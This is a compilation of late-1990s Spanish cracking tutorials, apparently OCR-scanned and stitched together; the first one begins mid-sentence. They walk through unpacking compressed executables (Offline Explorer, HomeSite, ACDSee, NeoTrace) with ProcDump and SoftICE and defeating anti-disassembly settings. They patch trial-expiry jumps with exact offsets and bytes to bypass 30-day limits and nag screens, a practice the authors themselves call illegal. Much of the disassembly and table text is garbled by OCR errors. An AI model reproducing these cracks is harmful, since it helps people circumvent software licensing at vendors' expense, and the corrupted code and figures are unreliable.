Explorer terminara de ejecutarse, cundo termine de ejecutarse y no antes cerráis Offline 
Explorer y esperáis unos segundos asta que el ProcDump termine de descomprimir todos los 
procesos, enseguida termina y se abre una ventana para que guardéis el nuevo ejecutable ya 
descomprimido, lo guardáis con el nombre que queráis este nuevo ejecutable ocupara unos 1.070 
KB, 


Aseguraros de que el nuevo ejecutable funciona correctamente, le hacéis doble clip y tiene que 
funcionar exactamente igual que el original, ahora ya podemos desensamblarlo con el W32Dasnm, 
vamos corriendo y lo desensamblamos, coñoo pero tampoco nos muestra código, Que pasa¿? Pues lo 
que ocurre es que tiene una protección contra debugers, desensambladores y programas que 
puedan seguir sus procesos. 


Pero como el ProcDump es una Joya también quitaremos esa protección. Ahora vamos nuevamente al 
ProcDump y pulsamos la opción [PE editor] y editamos el nuevo ejecutable ( el que tenemos 
descomprimido )cuando lo tengamos editado veremos esto: 


Esto son datos del ejecutable que no explicare porque esta todo explicado en el manual sobre 
el ProcDump de WKT que os vuelvo a decir donde encontrarlo. 


http://www.wco.com/-=micuan/WKT/pdumptut . htm 


ahora pulsamos la opción [Seecions]con lo cual se abré una nueva ventana de opciones para 
poder manipular algunas cosillas de nuestro ejecutable descomprimido. 


Sections Editor 


Sections Informations : 


OK | 
00D 0000 00001000 O0056C00 00000400 20000040 
00003000 00001000 00001800 00057000 C0000040 


00003000 000D 4000 0000000 00058800 C0000040 


00003000 00D 7000 00001 200 00058800 C0000040 
00001000 000D 4000 0000000 00059400 C0000040 
00001000 O00DB000 00000200 00059400 C0000040 Cancel | 


Y esto es lo que vemos, esto es la cabecera de nuestro ejecutable, aquí vemos algunas 
referencias como CODE, DATA, BSS ETC. Todas ellas seguidas de direcciones de memoria, teníamos 
que conseguir quitar la protección anti Dasm de nuestro programa, os enseñare como lo hago yo 
(lo que os explico a continuación desconozco el porque pero yo lo utilizo y por ahora me ha 
funcionado siempre) primero os diré que estos nombres que estamos viendo en esta ventana no 
siempre son iguales que estos y no siempre están colocados en esta posición, bueno yo siempre 
cojo el primer nombre en este caso CODE en la sección Characteristics tenemos el siguiente 
numero C0000040 bueno pues si pulsáis sobre CODE con el botón derecho del ratón se despliega 
un menú de opciones, escogéis Edit Sections y cambiáis el numero 


C0000040 por E0000020 Y cerráis todas las ventanas del ProcDump y ahora vamos a desensamblarlo 
nuevamente, primero hacer una copia del ejecutable descomprimido (nuestro nuevo ejecutable) 
cogemos el W32Dasm y lo desensamblamos, Jejeje cuanto tarda ahora he!! Esto es buena señal, 
como veis ahora tenemos todos los procesos del programa, ha sido interesante como modificando 
el ejecutable original hemos ido consiguiendo lo que queremos. 


Ahora utilizamos nuestras técnicas cracking, que las tenemos ya dominadas, es importante que 
tengáis adelantada la fecha para que el programa este caducado como he dicho antes con 35 días 
adelantado es suficiente, bueno ejecutamos el programa y como esta caducado nos muestra un nag 
que nos dice que la evaluación ha finalizado Sorry, this beta version has expired. 


Como siempre nos ponemos a pensar detenidamente y sin ningún tipo de prisas, si tenemos prisa 
mejor dejarlo para otro día. 


Bueno han pasado 30 días y el programa ya no funciona como puede ser¿?¿?¿ ayer si funcionaba y 
hoy no, entonces en alguna parte de nuestro ordenador seguramente en system.dat (el registro 
de Windows) ha guardado los datos del día que lo instalamos y Cada vez que ejecutamos el 
programa este mira la fecha y si no han pasado 30 días no nos mostrara Sorry, this beta 
version has expired, pero si han pasado 30 días entonces si. 


Como hará el programa para verificar esto ¿???? Pues lo típico seria que mediante una rutina 
tipo call XXXXXXXX se dedique ha realizar estas comprobaciones y según el día que sea le 
pasara un valor 10 0 a una comparación tipo Cmp XXX,xXxXxX O test XXX,XXX y esto hará que se 
ejecute un Je jne hacia el mensaje Sorry, this beta version has expired o que no se ejecute 
dependiendo de si a pasado la evaluación o no. 


Pues mediante Sor, this beta version has expired busquemos algo así 


Call XXXXXXX 


CMp XXX, XXXXXX / test XXX, XXX 


Jne XXXXXX / Je XXXXXX 


Yo creo que esto ya tiene que estar claro, por que en los manuales anteriores estamos hartos 
de ver este tipo de funciones. 


Localizamos Sorry, this beta version has expired en el W32Dasm y ahí esta casi abajo del todo, 
doble clip sobre la frase y otro doble clip por si hubiese mas llamadas a este texto, pero 
solo hay una en. 


* Possible StringData Ref from Code Obj ->"Sorry, this beta version has expired. " 


-=>"To get an updated version of Offline " 


->"Explorer, please press Web site " 


->"button." 


:004C9CA9 BAE49F4C00 mov edx, 004C9FE4 -> AQUÍ APARECEMOS 


:004C9CAE E82D92F6FF call 00432EE0 


:004C9CB3 8B06 mov eax, dword ptr [esi] 


:004C9CB5 8B80F0020000 mov eax, dword ptr [eax+000002F0] 


:004C9CBB 8B4058 mov eax, dword ptr [eax+58] 


Como siempre veamos los alrrededores de este codigo, siempre hacia arriba, porque lo logico es 
que quien da la orden para que se imprima Sorry, this beta version has expired este por encima 
de la frase, pensemos que estamos analizando un listado muerto, por lo menos ami me parece 
logico. Y que tenemos arriba 


:004C9C41 E89204F4FF call 0040A0D8 


:004C9C46 83C4F8 add esp, FFFFFFF8 


:004C9C49 DD1C24 fstp qword ptr [espl 


:004C9C4C 9B wait 


:004C9C4D 8D4DE6 lea ecx, dword ptr [ebp-1A] 


:004C9C50 8D55E8 lea edx, dword ptr [ebp-18] 


:004C9C53 8D45EA lea eax, dword ptr [ebp-16] 


:004C9C56 E89102F4FF call 00409EEC — Rutina de comprobacion 


:004C9C5B 80BB2105000000 cmp byte ptr [ebx+00000521], 00 


:004C9C62 0F8498000000 je 004C9D00 -——- nuestro salto 


:004C9C68 6681 7DEACE07 cmp word ptr [ebp-16], 07CE 


:004C9C6E 0F868C000000 jbe 004C9D00 


:004C9C74 66837DE809 cmp word ptr [ebp-18], 0009 


:004C9C79 0F8681000000 jbe 004C9D00 


:004C9C7F 833E00 cmp dword ptr [esi], 00000000 


:004C9C82 757€ jne 004C9D00 


:004C9C84 8B0DF83C4D00 mov ecx, dword ptr [004D3CF8] 


:004C9C8A 8B09 mov ecx, dword ptr [ecx] 


:004C9C8C B201 mov dl, 01 


:004C9C8E A120774B00 mov eax, dword ptr [004B7720] 


:004C9C93 E81CE9F7FF call 004485B4 


:004C9C98 8906 mov dword ptr [esi], eax 


:004C9C9A 8B06 mov eax, dword ptr [esi] 


:004C9C9C ES5B5DFDFF call 0049F9FC 


:004C9CA1 8B06 mov eax, dword ptr [esi] 


:004C9CA3 8B80F0020000 mov eax, dword ptr [eax+000002F0] 


Bueno pues esta mas que claro ha sido como en los manuales anteriores, 


call 00409EEC esta llamada comprobara la fecha actual y la fecha de instalacion, dependiendo 
del día que sea cmp byte ptr [ebx+00000521], 00 recibirá un valor u otro y este le dirá a je 
004C9D00 si tiene o no que saltar, fijándonos en la dirección a la que saltaría je 004C9D00 lo 
que nos conviene es que salte así se pasa de largo Sorry, this beta version has expired y no 
nos lo podra mostrar, que tenemos que hacer¿? Pues convertir je 004C9D00 en Jjmp 004c9d00 
convertirlo en un salto incondicional, que saltara siempre, pero convertir este saltto en un 
salto incondicional no es tan fácil como otras veces no¿? Ya que este no es el típico 


XXXXXX 7445 Je XXXXXxXx esto seria muy fácil verdad pero nosotros tenemos. 


004C9C62 0F8498000000 je 004C9D00 


y como podemos saber como sustituir je por jmp con tantos bytes como hay esta vez?¿ bueno lo 
primero decir que la cantidad de bytes varia dependiendo de la distancia a la que tenga que 
viajar el salto, cuanto mas lejos mas bytes (creo) 


En algún manual de estos ya explique como hacerlo, pero para que no busquéis los que no sepáis 


os lo explico nuevamente, yo lo hago así. 


Con el W32dasm como sabéis este dasm también cuenta con un debug, si pulsamos [ctrl1+L] aparece 
una opción para cargar el debug, pinchamos load y entramos en el debuger empiezan a aparecer 
un mogollón de ventanas y números, Bueno en una de las ventanas veréis la opción goto address 
la pulsáis y aparece otra ventana donde tenéis que meter la dirección de memoria donde se 
encuentra el salto que hay que partchear, pues en la casilla ponemos la dirección que es 
004C9C62 y pulsamos OK 


Veréis que en la ventana ha aparecido nuestro salto, claro hemos llamado a esa dirección de 
memoria con goto address ahora parchearemos el salto (ojo solo temporalmente ya que con el 
debug los cambios solo se hacen en memoria, cuando ejecutes nuevamente el programa estará 
original) para parchearlo pulsamos 


Path Code y se abre otra ventana con nuestro salto y con una casilla en blanco (Enter new 
Instructions) y hay escribimos el nuevo salto que como era un salto incondicional metemos 
estos datos jmp 004C9D00 y pulsais Enter 


Y ya veis en el recuadro que ha aparecido el salto nuevo así 


:004C9C62 E999000000 jmp 004C9D00 pues ya sabéis los nuevos Bytes 


Cambiamos OFFset C9262 


este 004C9C62 0F8498000000 je 004C9D00 


por :004C9C62 E999000000 jmp 004C9D00 


Editáis con el editor HEX la copia habíais hecho (claro del ejecutable nuevo,el descomprimido) 
y en la dirección de offset que tiene el salto OFFSET C9262 


REALIZAIS LOS CAMBIOS QUE TENEIS ARRIBA, salváis el ejecutable y voila fuciona perfectamente. 


Ahora que ya habéis crackeado el programa si queréis podéis volver a comprimir el archivo 
OE.exe , yo lo comprimí con el petite, al principio del manual tienes direcciones para 
conseguir compresores PE. 


IMPORTANTE No te olvides de volver a poner la fecha correcta en tu ordenador. 


Pues esto es todo. Que os a parecido.. interesante no¿? Como siempre mi mayor deseo es que 
entendáis esto como yo intento explicarlo. Es difícil escribir manuales creerme, pero mientras 
una sola persona los lea seguiré J 


Con cualquier duda mandarme un email, contesto a todos los email. 


Un saludo para todos/as (karpoff) 


Kf karpofffhotmail.com 


http://personal2.redestb.es/karpoff 


El uso de este material es solo para uso educativo, por ahora los cracks son ilegales cada 


cual es responsable del uso que le de a este tutorial, el autor no se hace responsable de 
nada. 
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- Herramientas _ Softlce v4.01, W32dasm v8.9, UltraEdit v6.20a,ProcDump 
Objetivo Mandar a la m 


5 de Noviembre de 1999 


Intro 


Hola amigos, como estan, espero q' bien..:-), despues de un corto periodo de 
tiempo volvi a ponerme las pilas para escribir algo,esta vez se trata de un editor 
html a pedido de un amigo personal y mediante esto trataremos de aprender algo 
no??... 

Muy bien, lo primero, lo primero, corramos el programa pa' ver q' 
sucede,...mmmm... nos sale una nag diciendonos q' nos quedan 30 dias ,bla,bla, 
como siempre, puro mercantilismo, lo primero (mi rutina) es 
desensamblarlo;...ok.... Uhhhh...., nos aparece un mensaje diciendo que el 
PE(portable ejecutable) no es un formato valido de windows y que el proceso 
terminara. 

Posiblemente el programa esta comprimido, asi que: 


Let's Crack 


Vamos a usar el gettyp, para ver que cuenta: 


[DIHOMESITE homesite4.exe] ----- 
DOS executable file - 1718272 bytes 


Portable executable (starting at 256 for 1718016 bytes) 
Found no known modifier or compiler. 

Calculated entrypoint: 15322 / 00003BDAh (RVA: 003EB3DAh) 
Required CPU type: 80386 

Requires any version of Win32 

Flags: 

File is executable 

Line numbers stripped from file 

Local symbols stripped from file 

32 bit word machine 

Linker version: 2.25 

Objects (object align = 00001000h): 

Name Virt size RVA Phys size Phys Ofs 

«Shrink0 00276000h 00001000h 00000000h 00000000h 
BSS 00001000h 00277000h 00000000h 00000000h 
.Shrink1 0000A000h 00278000h 00000000h 00000000h 
.tls 00000008h 00282000h 00000000h 00000000h 
.rdata 00000018h 00283000h 00000200h 00000400h 
«Shrink2 00157000h 00284000h 00000000h 00000000h 
«Shrink3 00001000h 003DB000h 00000200h 00019400h 
«rdata 0000001Ch 003DC000h 00000200h 001A3600h 
.data 0OODOBFACHh 003DD000h 00001600h 00000800h 
«¡data 00000958h 003E9000h 00000A00h 00001E00h 
«load 00002D26h 003EA000h 00002E00h 00002800h 
.reloc 000005F4h 003ED000h 00000600h 00005C00h 


Found 1614848 bytes overlay 
Absolute position: 103424 of 1718272 (= 6.0%) 
Overlay type: unknown (4853h) 


- Files identified: 1 of 1 (100.00%) 
- Total time: 330.0 ms (330.0 ms/file) 


Si bien no nos dice explicitamente que esta comprimido, podemos jugarnos a que 
si, pues hay un overlay de 1614848.(para mas informacion ver proyectos con 


procdump en la pagina de karpoff). 

No sabemos que compresor usa, pero si nos fijamos en los objects vemos algo 
sospechoso; unas secciones llamadas shrink0,shrink1,etc,si no recuerdo mal creo 
q' entre los compresores vi algo parecido y puesto que al comprimir un archivo el 
compresor dado renombra las secciones. 

Vamos fijarnos en procdump, le damos unpack, y miramos;mmmm.. estamos con 
suerte;-)) vemos uno que se llama pcsshrink y mas abjo shrinker3.2,shrinker3.3 y 
shrinker3.4. Ahora bien, como sabemos cual es el correcto, pa mi lo unico es 
probar; el primero no es pues genera un error, el segundo tampoco...., el 
tercero....¡¡¡¡ Yeahh!!!, este es, el shrinker3.3, y nos pide un nombre pa' guardar el 
archivo descomprimido,elegimos cualquera y lo guardamos. 

Ok, ahora probamos desensamblarlo y la verdad que tarda bastante, asi que 
pueden echarle una dormitada, una taza de cafe y un cigarrillo(fumar daña la 
salud), o incluso unos polvos con sus respectivas parejas...jeje....;-). 

Una vez completado el proceso(solo una observacion, siempre hay que probar el 
exe descomprimido, deberia funcionar exactamente igual que comp.) bsucamos 
en string reference algun indicio positivo, no encontre nada, no se por que sera 
,puede ser que los string que necesitamos los llame de otro archivo,como por 
ejemplo una libreria,etc,la verdad no se, y como no se usar bien el ida(que dicen 
es excelente,incluso mejor que el w32dsm), recurramos al softice. 

Vamos a poner un bpx createwindow, y nos deberia parar,(logicamente hay que 
cargar el archivo descomp.) 5veces F12 y estamos adentro, ahora otro bpx 
006573dd(esto lo supe haciendo F10 hasta que se dibujo la nag en la pantalla): 


:006573DD 55 push ebp 

:006573DE 68CD746500 push 006574CD 

:006573E3 64FF30 push dword ptr fs:[eax] 

:006573E6 648920 mov dword ptr fs:[eax], esp 
:006573E9 803D4CD2670000 cmp byte ptr [0067D24C], 00 
:006573F0 7416 je 00657408 

:006573F2 A148D26700 mov eax, dword ptr [0067D248] 
:006573F7 ESACCADDFF call 00433EA8 

:006573FC A12C696700 mov eax, dword ptr [0067692C] 
:00657401 8B00 mov eax, dword ptr [eax] 

:00657403 ESA4E8SDDFF call 00435CAC 


* Referenced by a (U)jnconditional or (C)onditional Jump at Address: 
:006573F0(C) 


:00657408 A12C696700 mov eax, dword ptr [0067692C] 
:0065740D 8B00 mov eax, dword ptr [eax] 


El call en 00657317, dibuja la forma de la ventana y el de 00657403 completa el 


trabajo, asi que evitaremos esos caminos.Dos instrucciones arriba del primer call 
hay un je, ponemos bc *, y despues un bpx en el je,corremos todo de nuevo y nos 
para, rfl z, x, ¡¡¡great!!! Bye,bye nag. 

El problema esta resuelto, ahora podes borrar el exe comprimido y usar el 
descomp. o hacer un loader para usar el exe comprimido, o volver a comprimir el 
programa crackeado. 


FeelFree...D.A 


Karpoff Spanis 
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Descompresion Manual 


Bueno, aca estamos de nuevo. Antes que nada un saludo a todos los crackers hispanos, a karpoff 


por postear mis tuts y por su ayuda en general ;-) y tambien a tornCdo por sus apuntes sobre 
descompresion manual. 


Ok, empecemos, el programa victima en este caso es el ACDseev3.0 que lo podes bajar de 
www.acdsystems.com. Una vez bajado e instalado hacemos una copia del programa con el 
nombre de copia de acdsee.exe; sabemos que el programa es un shareware de 30 dias y no hay 
opcion de registrarnos. 

A primera vista me parece que esta comprimido el programa por sus escasos 640kb para un 
download de 4 y un poco mas de Mb. 

Como primer punto de ataque vamos a adelantar unos 35 dias para que pasa, y como es logico 
nos aparece una ventana diciendonos que termino el trial y que si queremos podemos comprarlo 
o desinstalarlo de nuestra PC , tambien nos da una opcion a que nos extiendan el trial. 

Vamos a tratar de desensamblarlo con el w32dsm........ mmm...deja colgado el wdsm... ahora 
tratemos con el procdump, lo abrimos y le damos al boton PE Editor y abrimos la copia de 
acdsee.exe y le damos en Sections y nos muestra esto: 


Sections Editor 


- Sections Informations ; 


Name | VitualSize | Virtual Ditset Raw Difset 


text O0OCD 000 00001000 00058400 00001000 E0000020 
.tdata 00015000 OOOCEOOO 00005200 00059400 C0000040 
«data OO0OCODO OOOE 3000 00002200 0005 600 C0000040 
Ms 00001000 DODEFO0OD 00001000 060800 Co000040 
¿SIC 0065000 OOOFOODO 00024C00 0061800 C0000040 


,¡aspack 00018000 00155000 00014600 00086400 C0000040 a! Cancel | 


Vemos una seccion llamada .aspack, por lo tanto esta comprimido con el aspack, ahora que 
sabemos que compresor usa el programa podemos descomprimirlo con el procdump, para esto le 
damos cancelar y cancelar y despues en Unpack. 

Ahora tenemos que elejir el unpacker, pero hay 4 distintos con el nombre de aspack...¿cual 
elejimos?.. pues no se jeje.. solo hay que probar con todos hasta encontrar el correcto. 

Bueno despues de probar con todos y hasta con "unknown" y standard ninguno 
funciona...mmmm que pasa!!!!.... que se yo a lo mejor una nueva version del aspack o algun truco 
antidesempacador, la unica solucion parece ser una descompresión manual. A partir de ahora 
voy a señalar los detalles que segui para descomprimirlo, pero en realidad yo utilice primero el 
softice para "correjir'' el limite de 30 dias y lo logre solo que obviamente al estar comprimido no 
pude obtener un offset valido para parchearlo asi que tuve hacer todo el proceso de 
descompresion igualmente, por lo tanto voy a explicar ese proceso primero y despues el otro que 
es ya como cualquier otro crack de cualquier trial. 

Informacion sobre descompresion manual podes encontrar en www.immortaldescendants.com 
mayoritariamente en ingles. 

OK, empecemos con esto; abrimos el softice con el symbol loader esto no es lo mismo que el tipico 
control-d y poner un bpx, sino que desde la barra de tareas de windows, en inicio, programas, y 


numega softice elejimos el symbol loader: 
* NuMega SoftlCE Symbol Loader 
E Edit Module Help 


SOHICE is active / 


Le damos en file/ open module... y elejimos copia de acdsee.exe, despues le damos en module/ 
load; al darle load a mi me suele generar un error y me pregunta si quiere que lo cargue igual, 
simplemente le digo si, no se a que se debera el error pero me pasa siempre que ya no le doy 
importancia. En este caso nos abre la aplicacion pero no paro en el entrypoint (en la barra de 
tareas del loader hay un icono de un foquito y debe estar presionado)...mmmm, para que esto no 
suceda es decir, es decir nos pare el softice debemos irnos de vuelta al procdump y al PE Editor, 
elejimos nuestro programa o sea copia de acdsee.exe para no tocar el original y le damos click en 
Secctions: 


A 

Sections pea y 

CEET Virtual Offset Characteristics 
Ea 000 00001000 00058400 00001 000 E0000020 
00015000 ODOCE ODO 00005200 00059400 c0000040 
OD0OCODO O00E 3000 00002200 OD05E600 C0000040 
00001000 DODEFODO 00001000 00060800 E0000040 
00065000 ODOFOODO 00024000 00061800 20000040 
00018000 00155000 00014600 00086400 C0000040 


Ahora nos posicionamos sobre .text y con el boton derecho del mouse hacemos click y le damos a 
edit section: 


Modify section value 


Section nformations 


¡Name [text 
¡WVSize f0noco 000 Fa 00001000 


PSize [00058400 Offset [00001000 


¡Section Characteristics : IN [Cooonos0 Cancel | 


y en section characteristics cambiamos C0000040 por E0000020 le damos todo ok y listo, ahora 
debe parar el softice. 

cargamos de nuevo el symbol loader, nuestro programa y le damos mudule/ load, y ahora si 
rompe el softice. 

Vemos que en una de las ventanas del softice dice el nombre de nuestro programa, y al lado 
.aspack o sea que estamos en el comienzo de la rutina de descompresion, pues como sabran un 
programa comprimido se debe descomprimir en memoria para ejecutarse, ahora la cuestion es 
darle F10 hasta que haya algun Ret que nos lleve a la parte .text, recordando que cada vez que 
encontremos un salto; sea condicional o no; siempre que el salto sea hacia arriba, poner un 
breakpoint una instruccion por debajo de ese salto y despues darle FS, para para evitar los loop, o 
sino estariamos dias!!!!...¿una vez que nos para el softice continuar normalmente con F10 y 
siempre que suceda lo anterior hacer el mismo proceso. 

En la instruccion 005554c7 push 004a33bf esta la clave pues pone en la pila el entrypoint al 
programa descomprimido, asi que anota ese numero ; abajo de esta instruccion hay un Ret, y 
como sabemos que es el retorno al .text???, pues yo lo hice asi, cada vez que encontraba un ret 
ponia un bpx ya sea sobre el ret o sobre alguna instruccion cercana, asi si me lleva al .text ya tenia 
un bpx para volver al lugar y si no era todavia simplemente quitaba el bpx y seguia.Esto es 
ncesario pues cuando estamos posicionados sobre un ret que sabemos nos llevara al .text (por si 
surge alguna duda aclaro que el .text seria el programa normal ya que antes estabamos en el 
.aspack) debemos poner en el softice la instruccion: a eip, y despues jmp eip; esto para crear un 
loop infinito y dejarlo en memoria, una vez hecho esto le damos F5 para salir del softice y 
volvemos al procdump. Esta vez buscamos en la parte que dice Task nuestro programa y despues 
sobre el hacemos click con el boton derecho del mouse y le damos dump (full), y guardamos este 
con un nombre diferente para ver la diferencia. 

Ahora nos podemos fijar que el programa dumpeado es mucho mayor que el original.Ahora para 
poder usarlo buscamos otra vez en el procdump en la parte de Task nuestro programa y otra vez 
con el boton derecho, solo que esta vez le damos kill task. Muy bien, ahora solo nos resta arreglar 
el entry point para que funcione ,en el procdump le damos PE editor,elejimos el programa que 
acabamos de dumpear y donde dice entry point cambiamos el valor que esta por este 
otro:000a33bf (este valor se consigue restando el valor de 004a33bf de 00400000), ahora debera 
funcionar normalmente el programa dumpeado. 

Ahora se puede aplicar cualquier metodo para crackearlo, lo podes desensamblar etc, y una vez 
parchado , hacer un loader para usarlo con el programa original que es aprox. 60% mas 
pequeño. 


Tut by D.A 


Todos tus cracks estan en 


Karpoff Spanis 
Tutorial Descargado de o 


DONT E 


Neotrace 2.12 - Descomprimiendo NeoLite y quitando una NAG molesta ("Errar es 
humano”) 


Este texto a pesar de que varias personas lo habían revisado contenía un error garrafal en su anterior 
vida, siempre he avisado de que no soy más que un novato y esto tenía que pasar tarde o temprano, sin 
entrar en justificaciones simplemente pedir mil disculpas a quien haya podido hacerse una idea 
equivocada, aquí tenéis el texto corregido, espero que ahora si esté como debía... 


Saludos koleguitas! en el texto anterior atacábamos un programa comprimido con Shrink y utilizábamos 
para ello el DeShrink de [jOb], como es evidente esta utilidad sólo nos sirve para ese compresor así que 


voy a intentar explicaros un método para trabajar con cualquier comprimido/encriptado. 


A todos se nos presenta en algún momento este "problema" y la mayoría de las preguntas que me han 
llegado al respecto empezaban así: "Intento desensamblar un programa con WDASM pero no me aparece 
ninguna SDR", hay pequeñas variaciones "WDASM se cuelga", "WDASM me dice que el PE no es válido", 
etc. No os cerréis usando siempre WDASM, está claro que es muy sencillo de usar y que determinado 
tipo de protecciones nos duran menos de 30 segundos pero WDASM no es el "arma" definitiva, queda 
muy lejos de serlo además...Quede como ejemplo este programa que descomprimiremos sólo para 
aprender, para desprotegerlo no tendremos más remedio que usar SoftiCe, a ello... 


¿? Herramientas a utilizar : 


NeoTrace 2.12 de NeoWorx. 

SoftlCe 4.0 de Numega Tech. 

Interrupter 1.0 de Lazarus. 

ProcDump 1.6 Final de G-Rom, Lorian y Stone. 
WDASM 8.93 de URSoftware 

RISC Proccess Patcher 1.4 por RISC 


GetType 2.52 por PHaX 


¿? Qué es eso de ejecutables comprimidos y encriptados... 


Imaginaros que tenéis que guardar un archivo de texto pero que no os cabe en un diskette porque es 
muy grande, os dais cuenta de que hay cadenas que se repiten muchas veces, por ejemplo "Los 
caballeros de la mesa redonda fueron muy afortunados, nunca se golpearon los genitales contra una 
esquina de la mesa" pues hacemos un programilla (compresor) que nos sustituya en el archivo de texto 
esa cadena tan larga por otra más corta, por ejemplo "caballeros", al aplicarle el compresor tendremos 
nuestro archivo de texto con un tamaño más reducido pero necesitaremos otro programa 
(descompresor) que se ocupe de devolver la frase a su estado original, el proceso de encriptación es 
idéntico, necesitamos un encriptador que sustituirá determinadas cadenas por su equivalente encriptado 
y un desencriptador que lo devuleva a su estado original, en este caso el fin no será reducir el tamaño... 


Los programadores se encuentran con el problema de que sus programas son demasiado grandes, la red 


es un buen trampolín para encontrar víctimas que paguen por ellos pero todos escapamos de programas 
grandes ya que las conexiones son demasiado lentas, por culpa de programar con lenguajes visuales o 
simplemente por incapacidad de escribir algo más eficiente se ven obligados a recurrir a programas que 
les reduzcan el tamaño de sus "hijitos", pero ellos no van a decirte: "Oye mi programa está comprimido, 
ve a http://www.descompresor.com y descárgate el descompresor", lo meten en el código del programa 
de manera que el programa en ejecución utiliza el algoritmo de descompresión, lo aplica al programa 
comprimido y lo deja listo para ejecutarse en la memoria, ahí es donde entramos nosotros y volcamos 
desde la memoria el programa descomprimido a un archivo para estudiarlo en su estado original... 


A la hora de descomprimir un programa tenemos dos opciones, hacerlo nosotros solitos, como ahora 
veremos, o usar descompresores que otra gente haya preparado, puedes encontrar varios 
descompresores en la red... 


¿? Cómo saber si el programa está comprimido... 


Para no tener que atender a cosas como WDASM no lo consigue abrir, tarda más de lo normal en cargar, 
etc. tenemos una gran utilidad llamada GetType con la que veremos algunas características del 
ejecutable, en algunos casos hasta nos dirá con qué ha sido comprimido/encriptado...Es muy simple, 
sólo tienes que hacerlo correr y elegir el ejecutable Neotrace.exe, dejad las configuraciones que vienen 
por defecto...os aparecerá algo así: 


[C: ¡ARCHIVOS DE PROCRAMA1NEOTRACE NeoTrace.exe] 
DOS executable file - 367627 bytes 


Portable executable (starting at 240 for 367387 bytes) 
Found no knon modifier or compiler. 


Calculated entrypoint: 29370 £f ODOO7?2B4h —(RVA: DOOE9ZBAh) 
Required CPU type: 80386 
Requires Win 95 or NT 4 
Flags: 
Relocation info stripped from file 
File is executable 
Line numbers stripped from file 
Local symbols stripped from file 
32 bit vord machine 
Linker version: 6.0 
Objects (object align = 00001000h): 
Name Virt size EVA Phys size Phys Ofs 
.text 00026000 00001000k 00026000 00000000 
.rdata D0003000kh 0002?000k 00003000 00000000 
«data D0009D34h 000ZA000hk O0001000k 00001000 
.Ysrc DO0OOB4F28hk 00034000  00005000k 00002000 
.neolit DOO062B4kh 0DODES000hk OOOO1IBCAhKh  00007000h 


Found 331841 bytes overlay 
Absolute position: 35786 of 367627 (= 9.7%) 
Overlay type: unknown (1996h) 


Files identified: l of 1 (100.00%) 
Total time: 320.0 ms (320.0 ms/file) 


El GetType no ha sido capaz de decirnos con qué está comprimido el ejecutable pero si nos da info muy 
interesante, la segunda flechita nos dice que el programa tiene una diferencia considerable entre el 
overlay y el tamaño del programa lo que nos hace pensar que está comprimido, si le echamos un vistazo 
a los "headers" PE (de imprescindible lectura el texto de numIT_OR) vemos un delator << .neolit >>. El 
programa está comprimido con el compresor Neolite. Conviene que le echéis un vistazo a los distintos 
compresores que hay, casi siempre os encontraréis una sección en el encabezado PE que lo delate... 


Bueno ya sabemos que el programa está comprimido, y además con Neolite así que tenemos dos 
opciones, usar el Script de Neolite para el ProcDump o descomprimirlo nosotros, vamos a hacerlo 
nosotros a ver qué sale... 


¿? Preparando la descompresión... 


Para descomprimir el programa sin usar un descompresor tenemos un par de opciones, una con trabajo 
y la otra para vagos, las dos son efectivas pero como es evidente usaremos la de los vagos... 


Utilizaremos un pequeño programita llamado Interrupter, lo que hace este programa es colocar una 
llamada a la Interrupción 03 en el punto de entrada ("Entrypoint") del programa a 
descomprimir/desencriptar, de modo que sustituye los dos primeros bytes que hay en la dirección del 
punto de entrada por el código hexadecimal de esa llamada ( CC ). Con esto sólo tenemos que colocar un 
punto de ruptura en esa interrupción ( bpint 03 ) y apareceremos al principio del programa, además el 
Interrupter nos dice cómo devolver el programa a su estado original para que pueda ejecutarse... 


Sólo tenemos que abrir el Neotrace.exe (antes de nada haced un backup!!!) y pulsar en EDIT, os 
aparecerá algo así: 


Nos lo hace todo! sólo tenemos que meternos en SoftlCe, poner << bpint 03 >> y cargar el programa, en 
un segundito nos aparecerá de nuevo el SoftlCe, ponemos << e eip E9 >>, vemos que recuperamos el 
salto original que nos lleva al comienzo del programa << :004E92BA ¡mp 004E9365 >>, pulsamos F10 y el 
salto nos deja en algo tal que así: 


mov eax, [esp+04] 
and eax, [004E92CB] 


Call 004E96E5 ¡Llamamos a la rutina de descompresión, que haga su 


trabajo. 
inc byte ptr 
[004E9364] 
jmp eax ¡Saltamos al programa descomprimido. 


Ahora sólo tenemos que hacer dos cosas, primero nos colocamos sobre el salto al programa 
descomprimido y apuntamos el contenido de EAX, en mi caso 0041C905, después editamos en 


ensamblador (a ) y cambiamos ese salto por algo así como << jmp eip >> para que el programa quede 
ciclando en memoria y volcarlo... 


¿? Volcando el ejecutable descomprimido... 


Ahora tenemos el programa descomprimido en memoria, tenemos que volcarlo a un archivo para poder 
jugar con él, así que abrimos esa genialidad llamada ProcDump, veréis algo así: 


c windows systemisystray.exe FFFFE8C3 00400000 00004000  FFFFAFCS 
cwindowsisystemiloadwc. exe FFFFF345 01000000 00006000 — FFFFAFCS 
cMwindowsisystemilauncher.exe FFFE4F8D 00400000 00034000 — FFFFAFCS 
c4archivos de programatsddtctlctr32.exe FFFE12D9 00400000 00067000 — FFFFAFCS 
c:4archivos de programa'neotraceneotBFFCI59ED  D0400000  ODOFOOOO — FFFFAFCS 
c4crackingspd. 160 procdump.exe FFC1976D 00400000 00019000 — FFFFAFCS 


cwindows!systemkgqdespi. dll 
c:4archivos de programa'neotraceineot... 
cMwindowssystemticmp. dl 

c windows! systemiwinram. dll 

c windows systemtwsock32. dll 
cMwindowsisystemimswsock. dll 


AMO, y a 


Pulsamos sobre la tarea que veis en la flecha, sobre el Neotrace.exe, dadle al botón derecho y os 
aparecerá un menú, pulsad << DUMP FULL >>, os aparecerá un diálogo para que elijáis donde guardar el 
proceso volcado y lo guardáis, os aparecerá ese mensajito tan agradable...ya tenemos el ejecutable 
descomprimido, pero daros cuenta de que el programa no funcionará, para que funcione tenemos que 
cambiar el punto de entrada, ahora mismo el punto de entrada sigue siendo el del programa comprimido, 
tenemos que cambiarlo para que se pueda ejecutar el programa descomprimido, para esto tenemos la 
dirección apuntada antes, la dirección donde empezaba a ejecutarse el programa descomprimido << 
0041C905 >>, vamos a ProcDump de nuevo damos en << PE Editor >> y cambiamos lo que hay por algo 
tal que así: 


Entrypoint = Dirección obtenida de SoftlCe - Image Base, ya podemos ejecutar el programa, vaya acabo 
de ver su tamaño, el descomprimido es de 940kb y el comprimido de 360kb, si que estaba comprimido 
parece ser... 


...Vamos a abrir el programa descomprimido con WDASM... 


¿? WDASM no es DIOS, o si? o no? o no? o no? 


Cargamos WDASM abrimos el programa descomprimido y voalá! 


